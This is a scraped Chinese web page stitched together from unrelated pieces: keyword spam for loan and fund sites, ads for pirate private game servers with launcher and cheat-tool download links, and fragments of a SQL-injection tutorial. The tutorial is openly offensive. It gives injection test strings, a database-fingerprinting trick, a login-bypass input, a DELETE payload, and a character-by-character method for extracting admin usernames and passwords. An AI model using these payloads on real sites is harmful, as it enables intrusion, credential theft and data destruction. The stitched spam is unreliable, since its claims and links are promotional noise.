www.mengba.com

奇幻中文小说论坛 免费小说VIP|电子书下载-bbs.qhzw.com
http://bbs.qhzw.com
www.qhzw.com
小说|奇幻|玄幻|书库|武侠|言情|网游|奇幻|历史|军事|玄幻|奇幻小说|武侠小说|网游小说|都市言情小说|历史军事小说|悬疑推理小说|恐怖小说等在线阅读玄幻小说|武侠小说|历史小说|都市言情|游戏|军事|科幻推理|女性

深圳贷款信息网-www.0755loan.com
深圳贷款|深圳担保|深圳融资|讨债追债-深圳地区最大的贷款、担保、融资、投资、讨债、追债信息发布平台-www.0755loan.com
深圳贷款,深圳担保,深圳融资,深圳投资,深圳借贷,深圳借款,深圳抵押,深圳讨债,深圳追债
深圳贷款信息网是深圳地区最大的关于贷款、担保、融资投资和讨债追债信息的交流平台。网站内容专业，针对性强，相关热门关键字均在baidu和google等各大搜索引擎搜索结果前列，同时在大量相关网站投放广告，扩大本站影响力。本站访客群体具有极高的商业价值，是投放贷款、担保、融资投资和讨债追债方面广告的理想平台！

http://www.jijinzhishi.com
什么是基金|基金入门|基金基础|基金知识
http://www.jijinzhishi.com
基金入门知识,基金的入门知识,基金新手入门知识,基金入门基础,买基金的入门知识,基金投资入门知识,基金入门知识下载,基金入门基本知识,封闭基金入门知识,基金基础知识,基金的基础知识,股票入门基础知识,电脑入门基础知识,基金基础知识下载,股市入门基础知识,基金投资基础知识,开放式基金基础知识,封闭式基金基础知识,脱壳基础知识入门,有关基金的基础知识,基金基础知识学习,基金基础知识讲座,基金基础知识.txt,外汇入门基础知识,会计入门基础知识,股票入门的基础知识,吉他入门基础知识
http://www.jijinzhishi.com

私服补丁： http://www.17mu8.com/opensoft.asp?soft_id=18&url=1
私服主页： http://www.17mu8.com/
私服版本： sina版
私服介绍：

　　优良的设备，平衡的设置，完美的服务，公平的环境，真正的享受尽在魔幻天
堂，魔幻天堂将为您提供一个稳定、长久的天堂Ⅱ游戏服务器。我们本次设定不是为
了让玩家在短时间内了解天堂Ⅱ的概况，所以没有采用变态的倍率。我们力求保持新
浪服务器的游戏平衡，同时增加游戏节奏，权衡之后我们采用了较低的倍率设置，相
信这样的是设置能让您体验到天堂2的乐趣所在。相信魔幻的诚意，相信魔幻的实
力，你会在这里找到你想要的天堂Ⅱ。

魔幻2区17号内测欢迎新老朋友

服务器配置：
至强三型服务器 2台
英特尔至强2.4G*2 双处理器，
支持超线程为4cpu
3G ECC REG内存
36G scsi+80G IDE硬盘
100M带宽 保证流畅.

私服名称：魔幻2F
私服主页：http://www.17mu8.com/ 补丁下载都在主页上！
私服版本：大陆Sina版
服务器托管：省级电信VIP机房，100M光纤
人数上限：3000
私服介绍：10倍经验/15倍SP/20倍掉钱/20回收，开放：2转，攻城，全程传送，别的
待定。
长期稳定24小时开放！欢迎新老朋友的加入！没有最好，只会更好，您的支持就是我
们的努力！心动不如行动，还等什么呢？
2区QQ群：4036943

精心设置,让您爽不胜爽!专业化运营,没有游戏GM,绝对公平.稳定.长久!服务器特点
如下:
本服最吸引人的地方就是普通玩家也不限转数
采用目前奇迹业内最好的防外挂登陆器，基本可以防止目前已知的所有外挂，给玩家
一个奇迹净土。
法师守护已经修改，没有100%守护，绝对公平!敏捷任意加，不会掉线!
卖祝福、灵魂.卖各种技能石头及魔法书 出售XY
新人注册就送MU币8000万！送转生用的积分800分,祝福只卖15W 灵魂也卖15W !
应玩家要求!同时提高了宝箱出好装备的概率!黄金部队半小时一次
修改了药水恢复速度让您的PK打怪更加过瘾!
增加怪物刷新量,天空怪物成堆,不停刷怪,就一个爽字
法、剑、弓升级点数调整为5点/级,魔剑7点/级
工资为每2小时40点积分，每转所需积分固定为20分
第一转相当于二转，需要二转的积分及MU币，得二转的点数，等级只需220级，以
后每转固定积分20分，等级需要350级，得一转的积分。
每转送属性点350点

http://llmu.wdxl.net

天堂网游经过半个月的内部测试。将于11月16号晚上8点正式对外开放！本服务器采
用电信服务器，绝对不卡！经验1000倍！暂时开放100转（玩贯BT的来换下口味吧）
升级点数普通职业7点，魔9点！（卓越爆率提升600倍）商店出售追12幸运装备和武
器，转职物品，幸运翅膀。商店的石头10快钱一个
哦！超便宜，为大家初期钱难打考虑！
法师一体二血！
修改了MM召唤兽 可召唤天魔 红龙 蓝龙 幻影
修改了白色魔法师袭击，恶魔广场4刺激惊险
修改了时间为30分钟,最后10分钟刷红龙和幻影.
修正了红和蓝下线变3瓶和死亡刷钱的BUG
修正了组队掉钱少的BUG
开放古战场和天2，放逐地等地图！
竞技场进入方式 /移动 竞技场
天空2层进入方式 移动地下城回大陆即可进入
GM绝对做到公平的对待每一位玩家，决不发放装备给任何玩家~
玩家资料永久保存，决不删档！
登陆器已经开放下载！

地址：http://tty.meibu.com

★★兵临城下★★GT版传奇3,惊喜无限!公平.练级快,爆率高,完全免费!本世纪末关
闭!!!!!!


山东新开GT版传奇3,北方网通,不变态,喜欢玩变态的别进,爆率4倍,经验16倍,完全免
费!!6种新技能(陆续添加)!!!!!绝对保障玩家利益!!!
主页 http://www.blcxmir3.com
客户端(先下1.4版再下1.45的升级补丁)
http://www.mir3.com.cn/down/down_client_mir3.htm
登录器下载 http://www.blcxmir3.com/showsoft.asp?soft_id=5
外挂下载 http://www.blcxmir3.com/showsoft.asp?soft_id=8
对玩家承诺:
一、不刷一分钱，不刷一个等级，不刷一样物品，不杀一个人
二、稳定24小时开放，在不触犯中华人民共和国宪法的情况下，
服务器将长期开放，保留所有玩家的正常数据资料，
三、保证游戏速度，网通100兆光纤!!!!!!!
四、服务器正式开放以后,我们会不定期的频繁举办活动.并提供丰厚的虚拟及实物奖
品.
五、火热更新中!!!



玩游戏有逻辑极品鼠标拿??有北通方向盘????有雅芳化妆品??????

呵呵..兵临城下..打出的不光是极品装备!

◆服务器名：众兴网络
◆服务器IP：61.191.167.5

◆全新的二区正在筹备中，相信很快也会跟大家见面的。

传奇内容介绍:

◆我们与其他私服最大的不同点就在于，我们公司是苏皖地区大型电脑销售公司，长
期开放。服务器稳定。信誉优良。
◆本公司和中国电信签署了长达5年的宽带接入合同，我们郑重承诺游戏5年内不会关
闭！保障了游戏玩家的利益！
◆请牢记并保管好您的密码保护资料，没有正确的密保，密码是找不回来的；
◆采用专业的游戏服务器 CPU：Xeon 2.8G 内存：2G 硬盘：36G Scsi + Raid，绝对
强劲的配置；
◆电信A级机房环境. 100M 独享带宽光纤线路接入、能够承受千人在线、更加稳定；
◆专业团队制作维护，游戏客户端采用盛大即可；
◆坚决封闭以暗杀、变速、双倍、批量为主的一系列变态外挂，同时封穿人、不封穿
怪；
◆做到绝对的公平、公正、合理，积极听取玩家意见的好私服；
◆从开始测试到即将正式开放，共经历两个多月的准备时间，我们有信心做国内最好
的传奇私服之一；

游戏详细介绍：
◆完美仿盛大、绝不变态，新人出生1级，打怪经验100倍，绝对好升，更适合长期发
展；
◆BOSS级怪物刷新时间为2小时一次，6个暗之系列怪物刷新时间为1小时一次；
◆封闭双倍魔法、双倍攻击、暗杀、批量、强行交易、强行登陆等变态外挂(普通外
挂可用)；
◆生命、龙戒、三眼、铂金、炼狱等普通装备，可打白野猪爆出(爆率高)；
◆裁决、龙纹、骨玉、绿色、力量、龙手、紫碧螺等，可在祖玛7、封魔殿、牛洞和
幻境爆出(爆率一般)；
◆圣战、法神、天尊等终级装备，可去赤月或者幻境和王者禁地打双头血魔，金刚和
赤月恶魔爆出(爆率适中)；
◆逍遥扇、怒斩、龙牙可在牛魔王，暗之牛魔王，暗之触龙神身上爆出（爆率适
中）;
◆40级衣服爆出的6个地方，和盛大一样，勋章只有圣域爆出，开放王者禁地；
◆更新传送员的功能，让您方便冲级、打装备，练级赚钱两不误；
◆活动精彩，让你意想不到的快乐，每个星期都会安排小型活动，每月一次大型活
动，将会在本传奇程现；

温情提示：
◆请玩家在申请帐号的时候，记好自己的密码保护（不要过于简单，以免被他人套
取）。
◆管理员QQ:3214756
◆技术员QQ:3214756 Email：beyondtwo2@yahoo.com.cn
◆管理员热线:(0)13965644182

前段时间实在是太忙,没什么时间,哎,感觉很对不起大家,梦吧网络游戏私服发布平台也因为某些原因停了几个月,在几个朋友的努力下,又再次开张,这段时间站长将会再次更新大量的私服信息,希望大家继续支持!
http://china4f.info
http://4f.mengba.com
http://www.mengba.com/4f
传奇2私服,传奇3私服,奇迹MU私服,A3私服,天堂私服,天堂2私服,仙境传说RO私服,大海战,红月私服,,,,,
传奇2IP,传奇3IP,奇迹MUIP,A3IP,天堂IP,天堂2IP,仙境传说ROIP,大海战IP,红月IP,,,,,

梦吧娱乐论坛：http://www.mengba.com
私服发布:http://china4f.info
免费写真:http://tuku.info

欢迎大家捧场！

应某些朋友的要求,花了好大的工夫终于申请到云网的代理了,而且把价格调得很低,比官网卖的便宜得多,有兴趣的朋友可以去我的站买http://mengba.com或则http://www.mengba.com
如果量大的话还可以直接与我联系,留言或则QQ:22060764,因为是直销比网站还可以更便宜.
另外,4F发布地址改成http://mengba.com/sf

仿盛大!5月28号正式开放;现在测试阶段 物品每项属性都加1点;比如裁决就是攻击31
魔1道1强度1准 更新与盛大同步




服务器名字：我为传狂




服务器 IP：221.224.4.194




服务器地点:江南古城 位于 姑苏城外吴江市

是否固定IP： 是
--------------------------------------------------------------------------
--------------------------
多少倍经验： 64倍
--------------------------------------------------------------------------
--------------------------
GM是否公平：绝对公平 客服QQ群：2974759
--------------------------------------------------------------------------
--------------------------
官方网站：



http://www.cnzhushi.com/www1/index.html

登陆器下载:http://cnzhushi.com/www1/gsrx.zip 请大家务必下载登陆器;成功解
决反弹问题
简单介绍：
用专业服务器独享100M光纤-千人不卡！可以容纳2000人同时在线.24小时开机！绝对
不会关闭~！
封闭双倍和加速外挂！绝对稳定；正在修改了所有BUG！
--------------------------------------------------------------------------
------------------------
客服QQ群：2974759---------------------------------------------------------
-------------------------------------------
服务器配置：
双至强CPU P4 2.8HT 内存：2.5G ECC 网卡:1000M 主 板:DELl
硬盘:72G/10000转 线路:中国IDC电信、 保障南、北方都不卡欢迎大家来测试 测试
阶段发装备调及;进去后打个怪就可以了 正式开放后将与1及开始 GM不掺于游戏
和调及 公平公开 提 建议请加QQ群2974759




封加速攻击 封加速跑和加速走 封双倍和两次魔法 关参数!
封穿人 封黄白长句刷屏
封外挂通买 加强了道士的技能除了召唤骷髅 神兽外多了2个召唤兽
神圣战甲术 幽灵盾 加攻击(新鲜)
实现了祈祷生效 实现了255腕力,负重锁定.直升0-255级没有一级的腕力负重会
出现问题.装备上与盛大完全一致去掉了已知的脚本漏洞服务端默认的经验是64倍是
由M2主程序决定的攻城时间是交头象的第二天升武器等待时间10分钟减小了号角的暴
率控制行会数量,以增加凝聚力,使得沙城争夺更激烈沙城的皇宫设置为不能使用随
机!这样就能提高沙的收入了!!当然沙的争夺也更....呵呵缩短了尸体停留时间增加
了美容美发,超负重服务, 爆出与刷的物品每项属性都加1
点 比如裁决就是攻击31魔1道1强度1准16件新衣服的地点跟盛大的一样

私服名称：爱之奇迹
私服主页：http://222.56.47.34
私服介绍：
0.97B
经验值调整为1000倍，物品几率 180%
不定时+5宝箱 血色城堡任务间隔: 30分钟恶魔广场任务间隔：1小时
黄金部队继续开放
爆竹继续开放
其网站下载登入器

一区:天外飞仙 IP:218.70.171.62
二区:飞仙世界 IP:218.70.171.19

上千种新装备,超多新地图:火龙洞,蛮荒,光明顶,镇妖塔,幽灵般,苍月岛,和即将开放
的贵族寺庙,幻境等等..加入3.0的数十种新怪..

北方森林A3服务器越开越好玩.欢迎广大玩家参与.

服务器效果图大家去看看
http://a3.noritel.com.cn/bbs/UploadFile/2004423111270839.jpg
超级稳定A3新开服务器(想要要的狂入)
北方玩家 我们终于有属于自己的高档稳定A3服务器拉 哈哈哈哈哈。东北的兄弟
父老们 我们的服务器架设在 辽宁沈阳 服务器位于网络北方重要节点的沈阳市内 速
度绝对快 服务器配置绝对稳定绝对高档 哈哈哈哈 福音啊 过瘾啊 东北用户绝对不
卡 欢迎大家来爽爽 嘿嘿。。。。。。
经过长时间的内部测试和调整与维护 北方森林A3服务器已经进入正式外部测试
阶段服务器经过长时间的内部测试已经基本稳定运行十多日，现在开始正式外部测
试，欢迎广大A玩家来我们这里爽一下。
本服务器采用帝王1.21客户端 基本解决常见的 回档 卡级 人物进不去 和超级
武器攻击力 等等一些列的问题 保证游戏绝对公平绝对稳定。我们发现问题会急事修
改 服务器测试期间档案全部保留.而且服务器会长期开放,这是本服务器对大家的承
诺。
本服务器架设于电信机房 采用IBM高档服务器 以及100MB城域骨干网络架设
速度绝对一流 保证可以容纳千人在线游戏。现在已经越来越完善 修改众多
BUG 。
本服务器游戏规则 采用50倍普通升级经验值 50倍任务升级经验值 和50倍钱的
任务奖金(如果感觉不好 我们以后会考虑修改这个数字)极品任务卷轴金钱奖励10000
的任务做好后金钱奖励会到500万 80%掉暴率 100%的符石合成率 玩家人物升级到100
级 GM会发给你33级全属性极品鸟一只.商店里面有卖所有的初级技能书 但是少数终
极技能书没有买的 如果什么都有卖就太变态了。
欢迎大家来体会 （如果您已经有了别的服务器的1.21版本客户端的话 请直接下
载 本服务器的登陆器文件然后覆盖A3目录就可以 直接进入我们的服务器了 ）
本服务器 网站 http://a3.noritel.com.cn
本服务器注册直接连接 http://a3.noritel.com.cn/regist_agree.asp
所需要下载直接连接 完整客户端文件 http://a3.noritel.com.cn/client.rar
(如果有完整客户端请下载登陆器直接登陆即可)登陆器文件
http://a3.noritel.com.cn/dlq.rar
商店文件补丁 http://a3.noritel.com.cn/data.rar
A3专用汉字输入法下载
http://a3.noritel.com.cn/a3input.rar

欢迎大家多提宝贵建议 因为毕竟是外部测试还有好多不尽人意的地方 请各位朋友们
勇于在论坛提出 我以后会根据大家的意见 给予适当的修改 我在这里谢谢大家
了。

[公告]北方森林“新人生存方式”新手必须看.
新人来了老说说升级慢 没人带没人组队人太少 没钱 没属性石头 还有符石太贵
不敢乱花钱去合成 而且怕合成失败,还有就是服务器是否定期组织各种活动?实际这
些都不是问题 以下就是解决办法,新老玩家多多注意。

新人建立人物和选择出生地点:
新人建立ID后进入游戏 开始选择人物 选择人物的时候会让你输入人物名字
最好大家用英文 因为有时候输入的中文别人看了会是乱码所以就很难在游戏里联系
到这些乱码名字的玩家了, 还有在选择出生低点的时候建议选择 左面的蓝色的那个
城市 名字叫 “关纳托”因为这里人比较多 大多玩家都会选择这个城市出生 所以这
里人就越来越多 反而右面的红城 泰模查 人就很少了. 最后至于用什么职业大家自
己考虑明白,这里不作详细说明.

升级慢:
实际不慢 我们老玩家可以辅助你们 而且老玩家辅助你们升级的时候钱会得的
比自己打怪得钱高1倍. 所以50以下玩家建议找老玩家辅助升级 地点去 克莱佛1
层. 50以后建议和同级得人物组队去 狼得3 升级 因为组队升级速度和得经验速度
会翻倍整机得 所以建议人越多越好。等玩家到70级的时候可以去接受一个人 做完了
后就可以直接跳到75级,注意:这个任务必须要在74级之前接受,然后最晚要在79级值
钱完成.

赚钱:
实际钱不少 低级人物可以作任务每次估计都可以得到50万到100万 不等的金
钱奖励 这些钱足够新人生存了. 到了可以接受金钱奖励10000以上钱的任务做完
后 金钱应该是给你500万的. 难道这还不够么？

没有属性石头 :
实际新人作任务时候就会给很多属性石头的 足够用了, 等到级别太高时候作
任务的确属性石头没有新人给的多 但是的确也给只是 少了一点点 但是足够使用了,
要石头就去作任务吧.

符石贵不敢乱合成怕失败:
实际这也不是问题 我们这个服务器我已经说了 你能接到10000金钱奖励的任
务 做完后应该给你500万的钱 所以这么多钱买的起符石的，怎么能说石头贵呢？还
有这里的合成公式基本都是成功率100%的 所以大家不要害怕 可以尽情合成.

服务器定期组织活动:
我们这里活动很丰富的,几乎每天晚上都有活动就是 大家组织在一起 集体追
杀GM的活动 ^_^而且几乎每天晚上8点左右都会有此活动的,就是如果您有能力 杀了
或者大家集体把GM杀了那么就会得到一些奖励 至于什么奖励么,到时候看GM心情. 但
是保证肯定不会太查的 呵呵 欢迎大家每

龙城A3欢迎你来测试 专业服务器 电信IP游戏不卡 各种职业卷轴蓝国有卖 10
倍经验 8倍爆率 检体中文任务***注意任务时请您小退在重新登陆就能看见中文开始
时是乱码***有BUG请您联系QQ394434000
经过酷龙工作室全体工作人员的努力 <龙城A3> 开始测试了

合成: 1-7阶成功率90% 7-8阶成功率60 爆率: 80%



商店:升级宝石，符文1-10，3 1-6阶装备 1-4阶武器,全套技能书



怪物经验: 10倍 任务经验: 10倍 任务钱: 10倍 骑士团: 开放 彩票: 开放 赌狗:
开放



注意：开始时是乱码 执行任务时 请您小退在重新登陆 就能看见中文 (近期将改好)

下载补丁包之前 退出游戏后 把所有文件解压后 复制到龙城A3游戏目录
下 覆盖DATA下的 原有的文件 然后再进入游戏 建议玩家保留 两种 补丁包 以便随
时更新

龙城A3完整包 http://www.gogolong.com/down/lca3-wzb.rar

http://bbs.gogolong.com/down/lca3-wzb.rar

http://www.myrzc.net/龙城A3完整包.rar



龙城A3登陆器 http://www.gogolong.com/down/lca3-dlq.rar

http://bbs.gogolong.com/down/lca3-dlq.rar

http://www.myrzc.net/龙城A3登陆器.rar



NPC商店出售技能补丁包 http://www.gogolong.com/down/NPC-jn.rar
http://bbs.gogolong.com/down/NPC-jn.rar
论坛地址bbs.gogolong.com


龙城A3注册地址 http://www.gogolong.com/images/regist_agree.asp



希望喜欢龙城A3的朋友在游戏中愉快 对于您的支持酷龙工作事表示感谢

私服名稱 主頁 速度 怪經 任經 錢 卷軸 合成 客服

BT精品A3 http://51what.xicp.net/a3 加點慢 100 1000 1000 齊 100% 有

英雄A3 http://heroa3.126.com 有時卡 10 1000 1000 齊 未知 送鳥

新時代A3 http://221.234.18.211:81/a3 未知 100 50 未知 無 100% 無

菜鳥A3 http://www.kygd.net/a3web 不卡 100 300 300 齊 100% 無

前面已经把SQL注入攻击的简单方法履了一遍
今天我们继续就一些问题来好好研究一下

前面我们说可以通过一些返回信息来判断ＳＱＬ注入，但首先不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，ＳＱＬ注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。
其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的
那么，什么样的测试方法才是比较准确呢？答案如下：

① http://host/showdetail.asp?id=49

② http://host/showdetail.asp?id=49 ;;and 1=1

③ http://host/showdetail.asp?id=49 ;;and 1=2

这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：

可以注入的表现：

① 正常显示（这是必然的，不然就是程序有错误了）

② 正常显示，内容基本与①相同

③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）

不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提示类型转换时出错。

　　当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，下面我们在来坐分析。

不过我们先来说一个问题：
不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。

怎么让程序告诉你它使用的什么数据库呢？来看看：

SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示的话，那可以直接从出错信息获取，方法如下：

http://host/showdetail.asp?id=49 ;;and user>0

这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。

顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。

如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。

在确认可以注入的情况下，使用下面的语句：

http://host/showdetail.asp?id=49 ;;and (select count(*) from sysobjects)>0

http://host/showdetail.asp?id=49 ;;and (select count(*) from msysobjects)>0

如果数据库是SQLServer，那么第一个网址的页面与原页面http://host/showdetail.asp?id=49 是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。



如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。
们学会了ＳＱＬ注入的判断方法，但真正要拿到网站的保密内容，是远远不够的。接下来，我们就继续学习如何从数据库中获取想要获得的内容，首先，我们先看看ＳＱＬ注入的一般步骤：


第一节、ＳＱＬ注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]


(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即

sql injection也就是昨天说的SQL注入（也可以有其他的翻译，反正我喜欢用注入这个词）
昨天只举了个简单的例子，今天咱们来深入讨论这个吧

SQL injection可以说是一种漏洞，也可以说成是一种攻击方法，程序中的变量处理不当，对用户提交的数据过滤不足，都可能产生这个漏洞，而攻击原理就是利用用户提交或可修改的数据，把想要的SQL语句插入到系统实际SQL语句中，轻则获得敏感的信息，重则控制服务器。SQL injection并不紧紧局限在Mssql数据库中，Access、Mysql、Oracle、Sybase都可以进行SQL injection攻击。 这个昨天有提到但不全面今天我特地再说一遍。

SQL injection使得攻击者能够利用 Web 应用程序中某些疏于防范的输入机会动态生成特殊的 SQL 指令语句。举一个常见的例子：

某 Web 网站采用表单来收集访问者的用户名和密码以确认他有足够权限访问某些保密信息，然后该表单被发送到 Web 服务器进行处理。接下来，服务器端的ASP 脚本根据表单提供的信息生成 SQL 指令语句提交到 SQL 服务器，并通过分析 SQL 服务器的返回结果来判断该用户名/密码组合是否有效。

为了实现这样的功能，Web 程序员可能会设计两个页面：一个 HTML 页面 (Login.htm) 用于登录，另一个ASP 页面 (ExecLogin.asp) 用于验证用户权限(即向数据库查询用户名/密码组合是否存在)。具体代码可能象这样：

Login.htm (HTML 页面)

代码:<form action="ExecLogin.asp" method="post"> Username: <input type="text" name="txtUsername">
Password: <input type="password" name="txtPassword">
<input type="submit"> </form>


ExecLogin.asp (ASP 页面)
代码:<% Dim p_strUsername, p_strPassword, objRS, strSQL p_strUsername = Request.form("txtUsername") p_strPassword = Request.form("txtPassword") strSQL = "SELECT * FROM tblUsers " & _ "WHERE Username=’" & p_strUsername & _ "’ and Password=’" & p_strPassword & "’" Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." If (objRS.EOF) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & objRS("Username") End If Set objRS = Nothing %>


乍一看，ExecLogin.asp 的代码似乎没有任何安全漏洞，因为用户如果不给出有效的用户名/密码组合就无法登录。然而，这段代码偏偏不安全，而且它正是SQL 指令植入式攻击的理想目标。具体而言，设计者把用户的输入直接用于构建SQL 指令，从而使攻击者能够自行决定即将被执行的 SQL 指令。例如：攻击者可能会在表单的用户名或密码栏中输入包含“ or ”和“=” 等特殊字符。于是，提交给数据库的 SQL 指令就可能是：
代码:SELECT * FROM tblUsers WHERE Username=’’ or ’’=’’ and Password = ’’ or ’’=’’


这样，SQL 服务器将返回 tblUsers 表格中的所有记录，而 ASP 脚本将会因此而误认为攻击者的输入符合 tblUsers 表格中的第一条记录，从而允许攻击者以该用户的名义登入网站。

SQL 指令植入式攻击还有另一种形式，它发生在 ASP 服务器根据 querystring 参数动态生成网页时。这里有一个例子，此 ASP 页面从 URL 中提取出 querystring 参数中的 ID 值，然后根据 ID 值动态生成后继页面：
代码:<% Dim p_lngID, objRS, strSQL p_lngID = Request("ID") strSQL = "SELECT * FROM tblArticles WHERE ID=" & p_lngID Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." If (Not objRS.EOF) Then Response.Write objRS("ArticleContent") Set objRS = Nothing %>


在一般情况下，此 ASP 脚本能够显示具有特定 ID 值的文章的内容，而 ID 值是由 URL 中的 querystring 参数指定的。例如：当URL为 http://www.example.com/Article.asp?ID=1055 时，ASP 就会根据 ID 为 1055 的文章提供的内容生成页面。

如同前述登录页面的例子一样，此段代码也向SQL 指令植入式攻击敞开了大门。有些用户（比如我们）可能会把 querystring 中的文章 ID 值偷换为“0 or 1=1”等内容(也就是说，把 URL 换成 http://www.example.com/Article.asp?ID=0 or 1=1) 从而诱使 ASP 脚本生成不安全的 SQL 指令如：
代码:SELECT * FROM tblArticles WHERE ID=0 or 1=1

于是，数据库将会返回所有文章的内容。

当然了，本例服务器所受的攻击不一定会引起什么严重后果。可是如果我们变本加厉，比如用同样的手段发送 DELETE 等 SQL 指令。这只需要简单地修改前述 URL 中的 querystring 参数就可以了！例如：任何人都可以通过 “http://www.example.com/Article.asp?ID=1055 ; DELETE FROM tblArticles ” 之类的 URL 来访问 Web 网站。

但程序毕竟是各种各样的，有些可以通过修改URL数据来提交命令或语句，有些则不行，不能打URL的主意，怎么办呢？通过修改<input>标签内的value的值也可以提交我们构造的语句，SQL injection是很灵活的技术，但我们的目的只有一个，就是想

在第9天到第11天我们介绍了SQL这个概念，后来因为大家反映没用（其实是很有用的，基础不好怎么晋级呢？）
今天我们就来好好说说利用SQL进行攻击
什么是SQL注入式攻击？
所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造（或者影响）动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如：

　　⑴ 某个ASP.NET Web应用有一个登录页面，这个登录页面控制着用户是否有权访问应用，它要求用户输入一个名称和密码。

⑵ 登录页面中输入的内容将直接用来构造动态的SQL命令，或者直接用作存储过程的参数。下面是ASP.NET应用构造查询的一个例子：
System.Text.StringBuilder query = new System.Text.StringBuilder(
"SELECT * from Users WHERE login = ’")
.Append(txtLogin.Text).Append("’ AND password=’")
.Append(txtPassword.Text).Append("’");

⑶ 攻击者在用户名字和密码输入框中输入"’或’1’=’1"之类的内容。

　　 ⑷ 用户输入的内容提交给服务器之后，服务器运行上面的ASP.NET代码构造出查询用户的SQL命令，但由于攻击者输入的内容非常特殊，所以最后得到的SQL命令变成：SELECT * from Users WHERE login = ’’ or ’1’=’1’ AND password = ’’ or ’1’=’1’。

　　⑸ 服务器执行查询或存储过程，将用户输入的身份信息和服务器中保存的身份信息进行对比。

　　⑹ 由于SQL命令实际上已被注入式攻击修改，已经不能真正验证用户身份，所以系统会错误地授权给攻击者。
如果用户的帐户具有管理员或其他比较高级的权限，攻击者就可能对数据库的表执行各种他想要做的操作，包括添加、删除或更新数据，甚至可能直接删除表。
（对于这里有些名词如果你不太了解，请你翻阅以前的教程）
今天我们来说个很简单的用新闻页面的""&request 漏洞做的注入
在地址栏输入：

and 1=1

查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表
在地址栏：
and 0<>(select count(*) from admin)

返回页正常,假设成立了。

下面来猜猜看一下管理员表里面有几个管理员ID：

and 1<(select count(*) from admin)

页面什么都没有。管理员的数量等于或者小于1个

and 1=(select count(*) from admin)

输入=1没显示错误，说明此站点只有一个管理员。

下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。

and 1=(select count(*) from admin where len(username)>0)

猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字段,下面给大家几个常用的
user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu


用户名称字段猜解完成之后继续猜解密码字段
and 1=(select count(*) from admin where len(password)>0)

password 字段存在！因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧

我们已经知道了管理员表里面有3个字段 id,user,password。
id 编号
user 用户名
password 密码
下面继续的就是管理员用户名和密码的猜解了。一个一个来,有点麻烦,最好找个猜解机来

先猜出长度!

and 1=(select count(*) from admin where len(user)<10)

user 字段长度小于10

and 1=(select count(*) from admin where len(user)<5)

user 字段长度不小于5

慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确
and 1=(select count(*) from admin where len(user)=6)

下面猜密码,
and 1=(select count(*) from admin where len(password)=10)

猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了


下面该做的就是把他们拆开来一个一个猜字母
and 1=(select count(*) from admin where left(user,1)=a)
返回正常，第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了

开始猜解帐号的第二位字符。

and 1=(select count(*) from admin where left(user,2)=ad)

